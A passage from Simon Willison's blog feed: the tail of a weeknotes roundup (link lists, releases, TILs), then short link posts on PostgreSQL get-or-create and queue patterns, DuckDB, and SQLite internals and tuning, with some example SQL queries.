&lt;a href="https://simonwillison.net/2024/Aug/15/adam-newbold"&gt;Adam Newbold: [Passkeys are] something truly unique, because ba...&lt;/a&gt; - 2024-08-15&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/com2kid"&gt;com2kid: Having worked at Microsoft for almost a decade, I...&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/data-exfiltration-from-slack-ai"&gt;Data Exfiltration from Slack AI via indirect prompt injection&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/sql-injection-like-attack-on-llms-with-special-tokens"&gt;SQL injection-like attack on LLMs with special tokens&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/21/dangers-of-ai-agents-unfurling"&gt;The dangers of AI agents unfurling hyperlinks and what to do about it&lt;/a&gt; - 2024-08-21&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;llm&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/7/q-what-do-i-title-this-article"&gt;q What do I title this article?&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;prompt-engineering&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/7/braggoscope-prompts"&gt;Braggoscope Prompts&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/using-gpt-4o-mini-as-a-reranker"&gt;Using gpt-4o-mini as a reranker&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/llms-are-bad-at-returning-code-in-json"&gt;LLMs are bad at returning code in JSON&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;andrej-karpathy&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/andrej-karpathy"&gt;Andrej Karpathy: The RM [Reward Model] we train for LLMs is just a...&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;projects&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/convert-claude-json-to-markdown"&gt;Share Claude conversations by converting their JSON to Markdown&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/datasette-10a15"&gt;Datasette 1.0a15&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/datasette-checkbox"&gt;datasette-checkbox&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/18/fix-covidsewage-bot"&gt;Fix @covidsewage bot to handle a change to the underlying website&lt;/a&gt; - 2024-08-18&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;anthropic&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/gemini-15-flash-price-drop"&gt;Gemini 1.5 Flash price drop&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/14/prompt-caching-with-claude"&gt;Prompt caching with Claude&lt;/a&gt; - 2024-08-14&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/15/alex-albert"&gt;Alex Albert: Examples are the #1 thing I recommend people use ...&lt;/a&gt; - 2024-08-15&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/introducing-zed-ai"&gt;Introducing Zed AI&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;sqlite&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/9/high-precision-datetime-in-sqlite"&gt;High-precision date/time in SQLite&lt;/a&gt; - 2024-08-09&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/13/django-querystring-template-tag"&gt;New Django {% querystring %} template tag&lt;/a&gt; - 2024-08-13&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;ethics&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/10/where-facebooks-ai-slop-comes-from"&gt;Where Facebook's AI Slop Comes From&lt;/a&gt; - 2024-08-10&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;jon-udell&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/10/jon-udell"&gt;Jon Udell: Some argue that by aggregating knowledge drawn fr...&lt;/a&gt; - 2024-08-10&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;browsers&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/ladybird-set-to-adopt-swift"&gt;Ladybird set to adopt Swift&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;explorables&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/transformer-explainer"&gt;Transformer Explainer&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;ai-assisted-programming&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/12/tom-macwright"&gt;Tom MacWright: But [LLM assisted programming] does make me wonde...&lt;/a&gt; - 2024-08-12&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;hacker-news&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/12/dang"&gt;dang: We had to exclude [dead] and eventually even just...&lt;/a&gt; - 2024-08-12&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;design&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/13/ai-designers"&gt;Help wanted: AI designers&lt;/a&gt; - 2024-08-13&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;prompt-injection&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/14/simple-prompt-injection-template"&gt;A simple prompt injection template&lt;/a&gt; - 2024-08-14&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;fly&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/fly-were-cutting-l40s-prices-in-half"&gt;Fly: We're Cutting L40S Prices In Half&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;open-source&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/whither-cockroachdb"&gt;Whither CockroachDB?&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;game-design&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/18/the-door-problem"&gt;“The Door Problem”&lt;/a&gt; - 2024-08-18&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;whisper&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/19/whisperfile"&gt;llamafile v0.8.13 (and whisperfile)&lt;/a&gt; - 2024-08-19&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;go&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/19/migrating-mess-with-dns"&gt;Migrating Mess With DNS to use PowerDNS&lt;/a&gt; - 2024-08-19&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="releases"&gt;Releases&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-pretty-traces/releases/tag/0.5"&gt;datasette-pretty-traces 0.5&lt;/a&gt;&lt;/strong&gt; - 2024-08-21&lt;br /&gt;Prettier formatting for ?_trace=1 traces&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/sqlite-utils-ask/releases/tag/0.1a0"&gt;sqlite-utils-ask 0.1a0&lt;/a&gt;&lt;/strong&gt; - 2024-08-19&lt;br /&gt;Ask questions of your data with LLM assistance&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/datasette/datasette-checkbox/releases/tag/0.1a2"&gt;datasette-checkbox 0.1a2&lt;/a&gt;&lt;/strong&gt; - 2024-08-16&lt;br /&gt;Add interactive checkboxes to columns in Datasette&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette/releases/tag/1.0a15"&gt;datasette 1.0a15&lt;/a&gt;&lt;/strong&gt; - 2024-08-16&lt;br /&gt;An open source multi-tool for exploring and publishing data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/asgi-csrf/releases/tag/0.10"&gt;asgi-csrf 0.10&lt;/a&gt;&lt;/strong&gt; - 2024-08-15&lt;br /&gt;ASGI middleware for protecting against CSRF attacks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/datasette/datasette-pins/releases/tag/0.1a3"&gt;datasette-pins 0.1a3&lt;/a&gt;&lt;/strong&gt; - 2024-08-07&lt;br /&gt;Pin databases, tables, and other items to the Datasette homepage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/django-http-debug/releases/tag/0.2"&gt;django-http-debug 0.2&lt;/a&gt;&lt;/strong&gt; - 2024-08-07&lt;br /&gt;Django app for creating endpoints that log incoming request and return mock data&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="tils"&gt;TILs&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://til.simonwillison.net/sqlite/sqlite-vec"&gt;Using sqlite-vec with embeddings in sqlite-utils and Datasette&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://til.simonwillison.net/django/pytest-django"&gt;Using pytest-django with a reusable Django application&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/performance"&gt;performance&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="performance"/><category term="sql"/><category term="sqlite"/><category term="datasette"/><category term="weeknotes"/></entry><entry><title>How to Get or Create in PostgreSQL</title><link href="https://simonwillison.net/2024/Aug/5/how-to-get-or-create-in-postgresql/#atom-tag" rel="alternate"/><published>2024-08-05T15:15:30+00:00</published><updated>2024-08-05T15:15:30+00:00</updated><id>https://simonwillison.net/2024/Aug/5/how-to-get-or-create-in-postgresql/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://hakibenita.com/postgresql-get-or-create"&gt;How to Get or Create in PostgreSQL&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Get or create - for example to retrieve an existing tag record from a database table if it already exists or insert it if it doesn’t - is a surprisingly difficult operation.&lt;/p&gt;
&lt;p&gt;Haki Benita uses it to illustrate a variety of interesting PostgreSQL concepts.&lt;/p&gt;
&lt;p&gt;New to me: a pattern that runs &lt;code&gt;INSERT INTO tags (name) VALUES (tag_name) RETURNING *;&lt;/code&gt; and then catches the constraint violation and returns a record instead has a disadvantage at scale: “The table contains a dead tuple for every attempt to insert a tag that already existed” - so until vacuum runs you can end up with significant table bloat!&lt;/p&gt;
&lt;p&gt;Haki’s conclusion is that the best solution relies on an upcoming feature &lt;a href="https://git.postgresql.org/gitweb/?p=postgresql.git;a=commitdiff;h=c649fa24a42ba89bf5460c7110e4fc8eeca65959"&gt;coming in PostgreSQL 17&lt;/a&gt;: the ability to combine the &lt;a href="https://www.postgresql.org/docs/current/sql-merge.html"&gt;MERGE operation&lt;/a&gt; with a RETURNING clause:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WITH new_tags AS (
    MERGE INTO tags
    USING (VALUES ('B'), ('C')) AS t(name)
    ON tags.name = t.name
WHEN NOT MATCHED THEN
    INSERT (name) VALUES (t.name)
    RETURNING *
)
SELECT * FROM tags WHERE name IN ('B', 'C')
    UNION ALL
SELECT * FROM new_tags;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I wonder what the best pattern for this in SQLite is. Could it be as simple as this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT OR IGNORE INTO tags (name) VALUES ('B'), ('C');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The SQLite &lt;a href="https://www.sqlite.org/lang_insert.html"&gt;INSERT documentation&lt;/a&gt; doesn't currently provide extensive details for &lt;code&gt;INSERT OR IGNORE&lt;/code&gt;, but there are some hints &lt;a href="https://sqlite.org/forum/forumpost/f13dc431f9f3e669"&gt;in this forum thread&lt;/a&gt;. &lt;a href="https://hoelz.ro/blog/with-sqlite-insert-or-ignore-is-often-not-what-you-want"&gt;This post&lt;/a&gt; by Rob Hoelz points out that &lt;code&gt;INSERT OR IGNORE&lt;/code&gt; will silently ignore &lt;em&gt;any&lt;/em&gt; constraint violation, so &lt;code&gt;INSERT INTO tags (tag) VALUES ('C'), ('D') ON CONFLICT(tag) DO NOTHING&lt;/code&gt; may be a better option.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=41159797"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/haki-benita"&gt;haki-benita&lt;/a&gt;&lt;/p&gt;



</summary><category term="postgresql"/><category term="sql"/><category term="sqlite"/><category term="haki-benita"/></entry><entry><title>Build your own SQS or Kafka with Postgres</title><link href="https://simonwillison.net/2024/Jul/31/sqs-or-kafka-with-postgres/#atom-tag" rel="alternate"/><published>2024-07-31T17:34:54+00:00</published><updated>2024-07-31T17:34:54+00:00</updated><id>https://simonwillison.net/2024/Jul/31/sqs-or-kafka-with-postgres/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.sequinstream.com/build-your-own-sqs-or-kafka-with-postgres/"&gt;Build your own SQS or Kafka with Postgres&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Anthony Accomazzo works on &lt;a href="https://github.com/sequinstream/sequin"&gt;Sequin&lt;/a&gt;, an open source "message stream" (similar to Kafka) written in Elixir and Go on top of PostgreSQL.&lt;/p&gt;
&lt;p&gt;This detailed article describes how you can implement message queue patterns on PostgreSQL from scratch, including this neat example using a CTE, &lt;code&gt;returning&lt;/code&gt; and &lt;code&gt;for update skip locked&lt;/code&gt; to retrieve &lt;code&gt;$1&lt;/code&gt; messages from the &lt;code&gt;messages&lt;/code&gt; table and simultaneously mark them with &lt;code&gt;not_visible_until&lt;/code&gt; set to &lt;code&gt;$2&lt;/code&gt; in order to "lock" them for processing by a client:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;with available_messages as (
  select seq
  from messages
  where not_visible_until is null
    or (not_visible_until &amp;lt;= now())
  order by inserted_at
  limit $1
  for update skip locked
)
update messages m
set
  not_visible_until = $2,
  deliver_count = deliver_count + 1,
  last_delivered_at = now(),
  updated_at = now()
from available_messages am
where m.seq = am.seq
returning m.seq, m.data;
&lt;/code&gt;&lt;/pre&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/ap6qvh/build_your_own_sqs_kafka_with_postgres"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/message-queues"&gt;message-queues&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqs"&gt;sqs&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/kafka"&gt;kafka&lt;/a&gt;&lt;/p&gt;



</summary><category term="message-queues"/><category term="postgresql"/><category term="sql"/><category term="sqs"/><category term="kafka"/></entry><entry><title>DuckDB 1.0</title><link href="https://simonwillison.net/2024/Jun/3/duckdb-10/#atom-tag" rel="alternate"/><published>2024-06-03T13:23:50+00:00</published><updated>2024-06-03T13:23:50+00:00</updated><id>https://simonwillison.net/2024/Jun/3/duckdb-10/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://duckdb.org/2024/06/03/announcing-duckdb-100"&gt;DuckDB 1.0&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Six years in the making. The most significant feature in this milestone is stability of the file format: previous releases often required files to be upgraded to work with the new version.&lt;/p&gt;

&lt;p&gt;This release also aspires to provide stability for both the SQL dialect and the C API, though these may still change with sufficient warning in the future.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/duckdb/status/1797619191341551969"&gt;@duckdb&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="sql"/><category term="duckdb"/></entry><entry><title>Why SQLite Uses Bytecode</title><link href="https://simonwillison.net/2024/Apr/30/why-sqlite-uses-bytecode/#atom-tag" rel="alternate"/><published>2024-04-30T05:32:54+00:00</published><updated>2024-04-30T05:32:54+00:00</updated><id>https://simonwillison.net/2024/Apr/30/why-sqlite-uses-bytecode/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sqlite.org/draft/whybytecode.html"&gt;Why SQLite Uses Bytecode&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Brand new SQLite architecture documentation by D. Richard Hipp explaining the trade-offs between a bytecode based query plan and a tree of objects.&lt;/p&gt;

&lt;p&gt;SQLite uses the bytecode approach, which provides an important characteristic that SQLite can very easily execute queries incrementally—stopping after each row, for example. This is more useful for a local library database than for a network server where the assumption is that the entire query will be executed before results are returned over the wire.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/DRichardHipp/status/1785037995101290772"&gt;@DRichardHipp&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/d-richard-hipp"&gt;d-richard-hipp&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="sql"/><category term="sqlite"/><category term="d-richard-hipp"/></entry><entry><title>Optimizing SQLite for servers</title><link href="https://simonwillison.net/2024/Mar/31/optimizing-sqlite-for-servers/#atom-tag" rel="alternate"/><published>2024-03-31T20:16:23+00:00</published><updated>2024-03-31T20:16:23+00:00</updated><id>https://simonwillison.net/2024/Mar/31/optimizing-sqlite-for-servers/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://kerkour.com/sqlite-for-servers"&gt;Optimizing SQLite for servers&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Sylvain Kerkour's comprehensive set of lessons learned running SQLite for server-based applications.&lt;/p&gt;
&lt;p&gt;There's a lot of useful stuff in here, including detailed coverage of the different recommended &lt;code&gt;PRAGMA&lt;/code&gt; settings.&lt;/p&gt;
&lt;p&gt;There was also a tip I haven't seen before about &lt;code&gt;BEGIN IMMEDIATE&lt;/code&gt; transactions:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;By default, SQLite starts transactions in &lt;code&gt;DEFERRED&lt;/code&gt; mode: they are considered read only. They are upgraded to a write transaction that requires a database lock in-flight, when query containing a write/update/delete statement is issued.&lt;/p&gt;
&lt;p&gt;The problem is that by upgrading a transaction after it has started, SQLite will immediately return a &lt;code&gt;SQLITE_BUSY&lt;/code&gt; error without respecting the &lt;code&gt;busy_timeout&lt;/code&gt; previously mentioned, if the database is already locked by another connection.&lt;/p&gt;
&lt;p&gt;This is why you should start your transactions with &lt;code&gt;BEGIN IMMEDIATE&lt;/code&gt; instead of only &lt;code&gt;BEGIN&lt;/code&gt;. If the database is locked when the transaction starts, SQLite will respect &lt;code&gt;busy_timeout&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/rsagpv/sqlite_for_servers"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/performance"&gt;performance&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite-busy"&gt;sqlite-busy&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="performance"/><category term="sql"/><category term="sqlite"/><category term="sqlite-busy"/></entry><entry><title>Quoting Seth Rosen</title><link href="https://simonwillison.net/2024/Mar/25/seth-rosen/#atom-tag" rel="alternate"/><published>2024-03-25T23:33:26+00:00</published><updated>2024-03-25T23:33:26+00:00</updated><id>https://simonwillison.net/2024/Mar/25/seth-rosen/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/sethrosen/status/1252291581320757249"&gt;&lt;p&gt;Them: Can you just quickly pull this data for me?&lt;/p&gt;
&lt;p&gt;Me: Sure, let me just: &lt;/p&gt;
&lt;p&gt;SELECT * FROM some_ideal_clean_and_pristine.table_that_you_think_exists&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/sethrosen/status/1252291581320757249"&gt;Seth Rosen&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/analytics"&gt;analytics&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="analytics"/></entry><entry><title>DuckDB as the New jq</title><link href="https://simonwillison.net/2024/Mar/21/duckdb-as-the-new-jq/#atom-tag" rel="alternate"/><published>2024-03-21T20:36:20+00:00</published><updated>2024-03-21T20:36:20+00:00</updated><id>https://simonwillison.net/2024/Mar/21/duckdb-as-the-new-jq/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.pgrs.net/2024/03/21/duckdb-as-the-new-jq/"&gt;DuckDB as the New jq&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The DuckDB CLI tool can query JSON files directly, making it a surprisingly effective replacement for jq. Paul Gross demonstrates the following query:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;select license-&amp;gt;&amp;gt;'key' as license, count(*) from 'repos.json' group by 1&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;repos.json&lt;/code&gt; contains an array of &lt;code&gt;{"license": {"key": "apache-2.0"}..}&lt;/code&gt; objects. This example query shows counts for each of those licenses.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/x5immj/duckdb_as_new_jq"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/jq"&gt;jq&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="cli"/><category term="sql"/><category term="jq"/><category term="duckdb"/></entry></feed>